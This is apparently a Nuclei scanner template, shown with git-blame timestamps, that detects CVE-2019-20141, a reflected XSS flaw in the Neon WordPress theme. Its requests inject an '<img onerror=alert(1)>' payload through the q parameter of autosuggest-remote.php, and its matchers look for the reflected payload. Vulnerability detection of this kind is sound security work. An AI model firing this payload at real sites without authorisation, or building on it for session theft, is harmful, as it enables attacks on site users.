2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-20141
|
2020-10-14 15:39:46 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Neon Dashboard - XSS Reflected
|
|
|
|
author: knassar702
|
|
|
|
severity: medium
|
2021-02-05 19:44:41 +00:00
|
|
|
description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-20141
|
|
|
|
cwe-id: CWE-79
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2019,xss
|
2021-02-05 19:44:41 +00:00
|
|
|
|
2020-10-14 15:39:46 +00:00
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2021-01-04 19:03:42 +00:00
|
|
|
- '{{BaseURL}}/data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)>'
|
|
|
|
- '{{BaseURL}}/admin/data/autosuggest-remote.php?q="><img%20src=x%20onerror=alert(1)>'
|
2020-11-12 08:25:56 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
2020-10-14 15:39:46 +00:00
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
2021-01-04 19:03:42 +00:00
|
|
|
- "><img src=x onerror=alert(1)>>)1(trela=rorreno"
|
2020-10-14 15:39:46 +00:00
|
|
|
part: body
|
2020-11-12 08:25:56 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
2020-12-23 13:38:42 +00:00
|
|
|
- "text/html"
|
|
|
|
part: header
|